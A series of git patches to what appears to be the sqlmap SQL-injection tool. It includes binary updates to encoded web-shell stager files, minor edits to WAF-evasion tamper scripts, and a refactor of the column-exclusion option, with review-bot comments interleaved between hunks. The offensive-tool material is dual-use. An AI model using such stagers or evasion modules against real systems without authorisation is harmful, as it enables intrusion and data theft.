diff --git a/shell/stagers/stager.asp_ b/shell/stagers/stager.asp_ index 75a64c1fc4158402453f7ba8b05da736f4c397a4..7918d6ac7aa9aa2dceb74c6b9727606327146241 100644 GIT binary patch literal 1201 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 literal 1320 zcmV+@1=soqoRult5!*R$0_P}P-K3fRq4d(143G}H|-qdQFvR8u(PWFpUPy?uvydU^(t(b6jkE#{y z0E%IvuxVCs06JzVij*orb6MW#)d)Y5kP(W!Yb8z1!{Z^Nqu#e3#macjI|uB;tBHrY zI3X^_Lo(nYloqyvYHZWI&S@^WbgqO~?v=t~`y;b8KdGL*d3UhYjydt4OSjH)m(Q0K_8gPCFkcQzfwSmlwmTpsPz^ z*H##TlycWD3X_-YlCyHldx{H{ILGTHB|ocyCFoVnj1q+@Ook$*hltngZ`j~Z05 zIl9|%z6b3{^&m|ymzlLe^u7oCX82rTRbsP2TBv6&v)~rSOD~FM-5t!$mc>rAU5aTa z#HAUDAx-ohsnL{-YFc>}lb&Ub(G;5z(+mlU{GccQGusK2%oHcGf;e_`Me_!y*JcZI zbBWqDwNG&TmT&!^z}fRrWh*TyRO`r$Yhr@xd10{$2>bS@tNYoXmlx=p*QfYo%JrLz 
zK=kU_>2G;_1Hf`5I#1np=Iz(D+ch)akj)+F1~&>^sU?6mJ;#Eqrj;x*Nu7~-Kh%sU z6EMr~_x)^0!66Tp*IiR@xOe=~B@_4?w9LzL$h4UIeO}K3*iW&}X!s)J@|zlVl~+*{ z6;aY%RmFhR`inO^3;<1vSk)N5iFL_O)OydU4LE~mx5~*^&59*}Nj|xbNwvqN`~_VN zAjg}OW6K4@g}2fjqZ)fzT#0;OO=-Uh+{DBRjyR;-GnM`_sgkicpyeN*6Vs0?9{EE5 z)TdpiBR7Wnz~7arz>bQeKA83&FO~XQlrwr-}YyiQZq) z$5ic~oNp`FvPNESF%nm>(*?Pt8MV$K%2}l2%kX%#D-}Q5URX0%mLd7IFwAA(Dc`N6de*i{QuGJIs;!N z=X@n#;4W`_G`3cQm1z(Z;afyWHfPH+@H@FIsAEcuiT>z(t1Id=e za0V^NORq()Mt5{3zaLj2EVrCc1IxL89(!s8fa99Tu)4jU$-q z>x=DeJWvsoQa3_SHv)aY+jasi%1|k#d eY+&}o3`{c46->@(5P%IN1U)XiKK*nc;xPJ@u#(UK diff --git a/shell/stagers/stager.php_ b/shell/stagers/stager.php_ index 64f8eacabdfe758595297d199003ff5c069690f2..54c8930a26d54df1f70408548752b0f64b8ddf5e 100644 GIT binary patch literal 379 zcmV->0fhbsoSl;I6oNlv#^3iSV>ppLvx3DRsny6=7p$rK!8^pfbZ|q@ofuOc|NAk` zE{wg{1LFqI0-oo&Q0kLY&LtaoYm(Pd8A~n4M~Y^E zbh&<-S0~qe$0gGUj4W?CJ#o*F58x;Evl;{sv)st_1%3i@eTq8FkS=k1;7e_Xb7ZtP zd&xaf`lZEcbvhU7Tg`QTRYF;J;cJxrjr-XY3b()}y(S-ES$au^gXT{4t(m`AOU%IT ztX0?hBv$dpwGFCqEB@uGl6sS);74tYU=hIvdVxSO*!N%zb?>~`R0s)JWX&iE$Go8O Z9W=>$2!iTxEU!@$%04m7)@Z_R>iXz6y($0z literal 377 zcmV-<0fznuoSl*)6v9tuh41}pUU#Tzi)1|318~*|} zt2}1A*ag!|SkFdSP_;QaCA7$C7o=0M(AtsjK|#4bxPmH?v1h@xu3*}T5BrBpT4Sy< z#Wjy&=2{-PrX-yd93S*VlG>7U+wBHt1(Ek}gwYeR3xjGa+Yh~h1~cW`V=T7AE*yz2 zq$}+RH_%-bz^)Y`z)7u5 zK8l!&p0c<-v4~=eazMs6-2#bQnn{){dDINsSKthhS4$Ak8#(LPE zD&;8 Date: Sat, 10 Feb 2018 11:06:31 +0100 Subject: [PATCH 032/428] Fixes #2923 --- lib/core/settings.py | 2 +- tamper/appendnullbyte.py | 2 ++ tamper/commalesslimit.py | 1 + tamper/concat2concatws.py | 2 ++ tamper/modsecurityversioned.py | 2 ++ tamper/modsecurityzeroversioned.py | 2 ++ tamper/plus2concat.py | 1 + tamper/plus2fnconcat.py | 1 + txt/checksum.md5 | 16 ++++++++-------- 9 files changed, 20 insertions(+), 9 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 118286cc652..05ed12b9549 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py 
@@ -19,7 +19,7 @@
 from lib.core.enums import OS
 # sqlmap version (...)
-VERSION = "1.2.2.9"
+VERSION = "1.2.2.10"
 TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
 TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
 VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
diff --git a/tamper/appendnullbyte.py b/tamper/appendnullbyte.py
index 3ea3d30b85a..d1c11069728 100644
--- a/tamper/appendnullbyte.py
+++ b/tamper/appendnullbyte.py
@@ -5,6 +5,8 @@
 See the file 'LICENSE' for copying permission
 """
+import os
+
 from lib.core.common import singleTimeWarnMessage
 from lib.core.enums import DBMS
 from lib.core.enums import PRIORITY
diff --git a/tamper/commalesslimit.py b/tamper/commalesslimit.py
index 28f8f56af7d..4b62246de1b 100644
--- a/tamper/commalesslimit.py
+++ b/tamper/commalesslimit.py
@@ -5,6 +5,7 @@
 See the file 'LICENSE' for copying permission
 """
+import os
 import re
 from lib.core.common import singleTimeWarnMessage
diff --git a/tamper/concat2concatws.py b/tamper/concat2concatws.py
index f21dc7346d2..58ff490e987 100644
--- a/tamper/concat2concatws.py
+++ b/tamper/concat2concatws.py
@@ -5,6 +5,8 @@
 See the file 'LICENSE' for copying permission
 """
+import os
+
 from lib.core.common import singleTimeWarnMessage
 from lib.core.enums import DBMS
 from lib.core.enums import PRIORITY
diff --git a/tamper/modsecurityversioned.py b/tamper/modsecurityversioned.py
index 224cd59f1ae..e287d25a2c8 100644
--- a/tamper/modsecurityversioned.py
+++ b/tamper/modsecurityversioned.py
@@ -5,6 +5,8 @@
 See the file 'LICENSE' for copying permission
 """
+import os
+
 from lib.core.common import randomInt
 from lib.core.common import singleTimeWarnMessage
 from lib.core.enums import DBMS
diff --git a/tamper/modsecurityzeroversioned.py b/tamper/modsecurityzeroversioned.py
index 34ba6a0a5a4..a3d24a55446 100644
--- a/tamper/modsecurityzeroversioned.py
+++ b/tamper/modsecurityzeroversioned.py
@@ -5,6 +5,8 @@
 See the file 'LICENSE' for copying permission
 """
+import os
+
 from lib.core.common import singleTimeWarnMessage
 from lib.core.enums import DBMS
 from lib.core.enums import PRIORITY
diff --git a/tamper/plus2concat.py b/tamper/plus2concat.py
index f26439dd1a7..5945797c045 100644
--- a/tamper/plus2concat.py
+++ b/tamper/plus2concat.py
@@ -5,6 +5,7 @@
 See the file 'LICENSE' for copying permission
 """
+import os
 import re
 from lib.core.common import singleTimeWarnMessage
diff --git a/tamper/plus2fnconcat.py b/tamper/plus2fnconcat.py
index 47572d2ccd5..27cbbea207f 100644
--- a/tamper/plus2fnconcat.py
+++ b/tamper/plus2fnconcat.py
@@ -5,6 +5,7 @@
 See the file 'LICENSE' for copying permission
 """
+import os
 import re
 from lib.core.common import singleTimeWarnMessage
diff --git a/txt/checksum.md5 b/txt/checksum.md5
index 94ff4745e1f..8c0dd8ba81f 100644
--- a/txt/checksum.md5
+++ b/txt/checksum.md5
@@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py
 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py
 a7db43859b61569b601b97f187dd31c5 lib/core/revision.py
 fcb74fcc9577523524659ec49e2e964b lib/core/session.py
-d4f192e51b660e59391dee667f79c652 lib/core/settings.py
+659fe726d16a8b4557d96d82181ace88 lib/core/settings.py
 d0adc28a38e43a787df4471f7f027413 lib/core/shell.py
 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py
 505aaa61e1bba3c3d4567c3e667699e3 lib/core/target.py
@@ -227,7 +227,7 @@ ec2ba8c757ac96425dcd2b97970edd3a shell/stagers/stager.asp_
 3e2e790c370442c3d98eaa88a3523b15 sqlmap.py
 4c3b8a7daa4bff52e01d4168be0eedbe tamper/apostrophemask.py
 4115a55b8aba464723d645b7d3156b6e tamper/apostrophenullencode.py
-5be6e24825d34437512b9021f35ee026 tamper/appendnullbyte.py
+d7e9a979eff4d7315d804a181e66fc93 tamper/appendnullbyte.py
 0298d81e9dfac7ff18a5236c0f1d84b6 tamper/base64encode.py
 55e9fbe57967e57a05a8ca77c312dc70 tamper/between.py
 e1d2329adc6ca89828a2eaec2951806c tamper/bluecoat.py
@@ -235,10 +235,10 @@ e3cdf13caedb4682bee3ff8fac103606 tamper/chardoubleencode.py 3b2f68476fbcf8223199e8dd4ec14b64 tamper/charencode.py b502023ac6c48e49e652ba524b8e18cc tamper/charunicodeencode.py 2c2b38974dc773568de7e7d771d7042c tamper/charunicodeescape.py -763aa317d43909a51dd4c2f36834718d tamper/commalesslimit.py +6a395de07b60f47d9474ace0a98c160f tamper/commalesslimit.py 211bb8fa36a6ecb42b719c951c362851 tamper/commalessmid.py 19acfde79c9a2d8458e15182f5b73d71 tamper/commentbeforeparentheses.py -61f895acaaf3dea78e237bdf5fe30a81 tamper/concat2concatws.py +334e4a2485b3a1bbc1734823b93ea694 tamper/concat2concatws.py dcdc433fe946f1b9005bcd427a951dd6 tamper/equaltolike.py 06df880df5d8749963f5562f60fd1637 tamper/escapequotes.py 4393cc5220d2e39c5c9c5a9af4e2635d tamper/greatest.py @@ -250,15 +250,15 @@ e2c2b6a67546b36983a72f129a817ec0 tamper/ifnull2ifisnull.py 1e5532ede194ac9c083891c2f02bca93 tamper/__init__.py 2dc49bcd6c55f4e2322b07fa92685356 tamper/least.py 1834b5409c449d2ea1b70a5038fed9eb tamper/lowercase.py -b7e892fc185927c7eb4a604f87b8b6c1 tamper/modsecurityversioned.py -a15ae5a795661fe992bb476346d54794 tamper/modsecurityzeroversioned.py +de4c83d33968a0cbf00cdfd8d35deddc tamper/modsecurityversioned.py +39981d5d6cb84aca950458739102bb07 tamper/modsecurityzeroversioned.py b4cadf2ddcdc0598c9a3bf24521a2fa1 tamper/multiplespaces.py be757e4c9a6fb36af7b9a8c444fddb05 tamper/nonrecursivereplacement.py e298e486c06bb39d81f10d61a5c4ceec tamper/overlongutf8more.py b9f698556f8333d9fa6eadaab44a77ab tamper/overlongutf8.py bc0363e4fc04240c9f7b81e4ecce0714 tamper/percentage.py -b30240804cce482b6ab77714508de89c tamper/plus2concat.py -a8f4a85be6e98b53060b066cd18eed15 tamper/plus2fnconcat.py +91272e566ceb4644254cd6abd613db21 tamper/plus2concat.py +265314f4b3b921f4c0d470ddaa6506e4 tamper/plus2fnconcat.py e94a1c7e4dc7450ac224436269d823bb tamper/randomcase.py 6368a971a80b1acbbbc6b76616bd96b9 tamper/randomcomments.py 48228322d40d97016b05e408c5234634 tamper/securesphere.py 
From e2cc9569e531e017bd2dd0aaab64d7671b0d1b0c Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 13 Feb 2018 15:53:50 +0100 Subject: [PATCH 033/428] Implementation for an Issue #2891 --- lib/core/option.py | 4 ++-- lib/core/optiondict.py | 2 +- lib/core/settings.py | 2 +- lib/parse/cmdline.py | 4 ++-- plugins/dbms/maxdb/enumeration.py | 4 ++-- plugins/dbms/mssqlserver/enumeration.py | 29 +++++++++++++++++++------ plugins/dbms/sybase/enumeration.py | 4 ++-- plugins/generic/databases.py | 9 ++++++-- plugins/generic/entries.py | 26 +++++++++++++++++----- plugins/generic/search.py | 4 ++-- sqlmap.conf | 4 ++-- txt/checksum.md5 | 20 ++++++++--------- 12 files changed, 74 insertions(+), 38 deletions(-) diff --git a/lib/core/option.py b/lib/core/option.py index b8d784cf59e..e3ace6ec65f 100644 --- a/lib/core/option.py +++ b/lib/core/option.py @@ -1785,8 +1785,8 @@ def _cleanupOptions(): if conf.col: conf.col = re.sub(r"\s*,\s*", ',', conf.col) - if conf.excludeCol: - conf.excludeCol = re.sub(r"\s*,\s*", ',', conf.excludeCol) + if conf.exclude: + conf.exclude = re.sub(r"\s*,\s*", ',', conf.exclude) if conf.binaryFields: conf.binaryFields = re.sub(r"\s*,\s*", ',', conf.binaryFields) diff --git a/lib/core/optiondict.py b/lib/core/optiondict.py index ba79baa9166..e71e4b3f179 100644 --- a/lib/core/optiondict.py +++ b/lib/core/optiondict.py @@ -139,7 +139,7 @@ "db": "string", "tbl": "string", "col": "string", - "excludeCol": "string", + "exclude": "string", "pivotColumn": "string", "dumpWhere": "string", "user": "string", diff --git a/lib/core/settings.py b/lib/core/settings.py index 05ed12b9549..e4dad087f38 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py 
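Review bot: Renaming the option key from `excludeCol` to `exclude` in the optiondict.py hunk (together with the `dest=` change in cmdline.py on L77 and the `sqlmap.conf` key on L82) presumably leaves any existing sqlmap.conf or REST API request that still sets `excludeCol` silently ignored, since nothing in the change reports the old key. A short compatibility shim in the option.py hunk, e.g. `if getattr(conf, "excludeCol", None) and not conf.exclude: conf.exclude = conf.excludeCol`, plus a deprecation warning naming the new key, would keep old configurations working for a release. `_cleanupOptions` itself starts and ends outside the option.py hunk.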
@@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.2.10" +VERSION = "1.2.2.11" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py index 776ed35fe79..83161b686f2 100644 --- a/lib/parse/cmdline.py +++ b/lib/parse/cmdline.py @@ -464,8 +464,8 @@ def cmdLineParser(argv=None): enumeration.add_option("-C", dest="col", help="DBMS database table column(s) to enumerate") - enumeration.add_option("-X", dest="excludeCol", - help="DBMS database table column(s) to not enumerate") + enumeration.add_option("-X", dest="exclude", + help="DBMS database identifier(s) to not enumerate") enumeration.add_option("-U", dest="user", help="DBMS user to enumerate") diff --git a/plugins/dbms/maxdb/enumeration.py b/plugins/dbms/maxdb/enumeration.py index 3ab5770a738..79a2c958708 100644 --- a/plugins/dbms/maxdb/enumeration.py +++ b/plugins/dbms/maxdb/enumeration.py @@ -120,8 +120,8 @@ def getColumns(self, onlyColNames=False, colTuple=None, bruteForce=None, dumpMod else: colList = [] - if conf.excludeCol: - colList = [_ for _ in colList if _ not in conf.excludeCol.split(',')] + if conf.exclude: + colList = [_ for _ in colList if _ not in conf.exclude.split(',')] for col in colList: colList[colList.index(col)] = safeSQLIdentificatorNaming(col) diff --git a/plugins/dbms/mssqlserver/enumeration.py b/plugins/dbms/mssqlserver/enumeration.py index 83b1a4ff40f..c0eec311b2e 100644 --- a/plugins/dbms/mssqlserver/enumeration.py +++ b/plugins/dbms/mssqlserver/enumeration.py 
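Review bot: `conf.exclude.split(',')` in the maxdb getColumns hunk is re-parsed on every call, and the same inline split is repeated in the mssqlserver (L78), sybase (L79), databases.py (L80), entries.py (L81, L82) and search.py (L82) hunks, so the matching rule for the option now lives in nine places. Splitting once where the option is normalized in `_cleanupOptions` (the option.py hunk on L76 already touches it), for instance into a constructed `conf.excludeSet = set(conf.exclude.split(','))`, would give a single definition and a single place to change if matching ever becomes case-insensitive. The list is also shared across database, table and column names, so a table and a column with the same name are both excluded; if that is intended, a sentence in the `-X` help text would make it explicit. getColumns starts and ends outside the hunk.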
@@ -14,6 +14,7 @@ from lib.core.common import isTechniqueAvailable from lib.core.common import safeSQLIdentificatorNaming from lib.core.common import safeStringFormat +from lib.core.common import singleTimeLogMessage from lib.core.common import unArrayizeValue from lib.core.common import unsafeSQLIdentificatorNaming from lib.core.data import conf @@ -94,8 +95,12 @@ def getTables(self): for db in dbs: if conf.excludeSysDbs and db in self.excludeDbsList: infoMsg = "skipping system database '%s'" % db - logger.info(infoMsg) + singleTimeLogMessage(infoMsg) + continue + if conf.exclude and db in conf.exclude.split(','): + infoMsg = "skipping database '%s'" % db + singleTimeLogMessage(infoMsg) continue for query in (rootQuery.inband.query, rootQuery.inband.query2, rootQuery.inband.query3): @@ -113,8 +118,12 @@ def getTables(self): for db in dbs: if conf.excludeSysDbs and db in self.excludeDbsList: infoMsg = "skipping system database '%s'" % db - logger.info(infoMsg) + singleTimeLogMessage(infoMsg) + continue + if conf.exclude and db in conf.exclude.split(','): + infoMsg = "skipping database '%s'" % db + singleTimeLogMessage(infoMsg) continue infoMsg = "fetching number of tables for " @@ -199,8 +208,12 @@ def searchTable(self): if conf.excludeSysDbs and db in self.excludeDbsList: infoMsg = "skipping system database '%s'" % db - logger.info(infoMsg) + singleTimeLogMessage(infoMsg) + continue + if conf.exclude and db in conf.exclude.split(','): + infoMsg = "skipping database '%s'" % db + singleTimeLogMessage(infoMsg) continue if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: @@ -271,8 +284,8 @@ def searchColumn(self): infoMsgDb = "" colList = conf.col.split(',') - if conf.excludeCol: - colList = [_ for _ in colList if _ not in conf.excludeCol.split(',')] + if conf.exclude: + colList = [_ for _ in colList if _ not in conf.exclude.split(',')] origTbl = conf.tbl origDb = conf.db 
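Review bot: The lines `if conf.exclude and db in conf.exclude.split(','):` plus the skip message are pasted three times in this file (both getTables hunks and searchTable), each directly under a system-database check of the same shape. A small method-level helper, e.g. `def _skipDb(self, db): return (conf.excludeSysDbs and db in self.excludeDbsList) or (conf.exclude and db in conf.exclude.split(','))`, would reduce each loop to one `if self._skipDb(db): continue`, with the two log messages moved into the helper. getTables and searchTable both start outside their hunks.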
@@ -318,8 +331,7 @@ def searchColumn(self): _ = conf.db.split(',') infoMsgDb = " in database%s '%s'" % ("s" if len(_) > 1 else "", ", ".join(db for db in _)) elif conf.excludeSysDbs: - msg = "skipping system database%s '%s'" % ("s" if len(self.excludeDbsList) > 1 else "", ", ".join(db for db in self.excludeDbsList)) - logger.info(msg) + infoMsgDb = " not in system database%s '%s'" % ("s" if len(self.excludeDbsList) > 1 else "", ", ".join(db for db in self.excludeDbsList)) else: infoMsgDb = " across all databases" @@ -334,6 +346,9 @@ def searchColumn(self): if conf.excludeSysDbs and db in self.excludeDbsList: continue + if conf.exclude and db in conf.exclude.split(','): + continue + if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: query = rootQuery.inband.query % (db, db, db, db, db, db) query += " AND %s" % colQuery.replace("[DB]", db) diff --git a/plugins/dbms/sybase/enumeration.py b/plugins/dbms/sybase/enumeration.py index a55d31a2e34..2b5f2d6f3a7 100644 --- a/plugins/dbms/sybase/enumeration.py +++ b/plugins/dbms/sybase/enumeration.py @@ -188,8 +188,8 @@ def getColumns(self, onlyColNames=False, colTuple=None, bruteForce=None, dumpMod else: colList = [] - if conf.excludeCol: - colList = [_ for _ in colList if _ not in conf.excludeCol.split(',')] + if conf.exclude: + colList = [_ for _ in colList if _ not in conf.exclude.split(',')] for col in colList: colList[colList.index(col)] = safeSQLIdentificatorNaming(col) diff --git a/plugins/generic/databases.py b/plugins/generic/databases.py index 36c00b4f226..02fce6b7af5 100644 --- a/plugins/generic/databases.py +++ b/plugins/generic/databases.py 
@@ -23,6 +23,7 @@ from lib.core.common import randomStr from lib.core.common import readInput from lib.core.common import safeSQLIdentificatorNaming +from lib.core.common import singleTimeLogMessage from lib.core.common import singleTimeWarnMessage from lib.core.common import unArrayizeValue from lib.core.common import unsafeSQLIdentificatorNaming @@ -298,7 +299,11 @@ def getTables(self, bruteForce=None): if conf.excludeSysDbs and db in self.excludeDbsList: infoMsg = "skipping system database '%s'" % unsafeSQLIdentificatorNaming(db) logger.info(infoMsg) + continue + if conf.exclude and db in conf.exclude.split(','): + infoMsg = "skipping database '%s'" % unsafeSQLIdentificatorNaming(db) + singleTimeLogMessage(infoMsg) continue infoMsg = "fetching number of tables for " @@ -410,8 +415,8 @@ def getColumns(self, onlyColNames=False, colTuple=None, bruteForce=None, dumpMod else: colList = [] - if conf.excludeCol: - colList = [_ for _ in colList if _ not in conf.excludeCol.split(',')] + if conf.exclude: + colList = [_ for _ in colList if _ not in conf.exclude.split(',')] for col in colList: colList[colList.index(col)] = safeSQLIdentificatorNaming(col) diff --git a/plugins/generic/entries.py b/plugins/generic/entries.py index 66a2eb2b56a..0fab15af1ec 100644 --- a/plugins/generic/entries.py +++ b/plugins/generic/entries.py @@ -22,6 +22,7 @@ from lib.core.common import prioritySortColumns from lib.core.common import readInput from lib.core.common import safeSQLIdentificatorNaming +from lib.core.common import singleTimeLogMessage from lib.core.common import unArrayizeValue from lib.core.common import unsafeSQLIdentificatorNaming from lib.core.data import conf 
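Review bot: In the databases.py getTables hunk the exclusion test compares the raw `db` with the plain names the user gave, while the log line right below it calls `unsafeSQLIdentificatorNaming(db)`, which suggests `db` may already carry DBMS-specific quoting here; if so, a quoted name never equals an entry of `conf.exclude` and the skip does not fire. Comparing the unquoted form, `if conf.exclude and unsafeSQLIdentificatorNaming(db) in conf.exclude.split(','):`, makes the check independent of that. The retained `logger.info(infoMsg)` for system databases two lines above also differs from the `singleTimeLogMessage` used for the new branch and in the mssqlserver version of the same loop (L78). getTables starts outside the hunk.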
@@ -68,11 +69,16 @@ def dumpTable(self, foundData=None): if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.HSQLDB): conf.db = conf.db.upper() - if ',' in conf.db: + if ',' in conf.db: errMsg = "only one database name is allowed when enumerating " errMsg += "the tables' columns" raise SqlmapMissingMandatoryOptionException(errMsg) + if conf.exclude and conf.db in conf.exclude.split(','): + infoMsg = "skipping database '%s'" % unsafeSQLIdentificatorNaming(conf.db) + singleTimeLogMessage(infoMsg) + return + conf.db = safeSQLIdentificatorNaming(conf.db) if conf.tbl: @@ -99,6 +105,11 @@ def dumpTable(self, foundData=None): tblList[tblList.index(tbl)] = safeSQLIdentificatorNaming(tbl, True) for tbl in tblList: + if conf.exclude and tbl in conf.exclude.split(','): + infoMsg = "skipping table '%s'" % unsafeSQLIdentificatorNaming(tbl) + singleTimeLogMessage(infoMsg) + continue + conf.tbl = tbl kb.data.dumpedTable = {} @@ -129,8 +140,8 @@ def dumpTable(self, foundData=None): columns = kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)][safeSQLIdentificatorNaming(tbl, True)] colList = sorted(filter(None, columns.keys())) - if conf.excludeCol: - colList = [_ for _ in colList if _ not in conf.excludeCol.split(',')] + if conf.exclude: + colList = [_ for _ in colList if _ not in conf.exclude.split(',')] if not colList: warnMsg = "skipping table '%s'" % unsafeSQLIdentificatorNaming(tbl) @@ -465,6 +476,11 @@ def dumpAll(self): conf.db = db for table in tables: + if conf.exclude and table in conf.exclude.split(','): + infoMsg = "skipping table '%s'" % unsafeSQLIdentificatorNaming(table) + logger.info(infoMsg) + continue + try: conf.tbl = table kb.data.cachedColumns = {} 
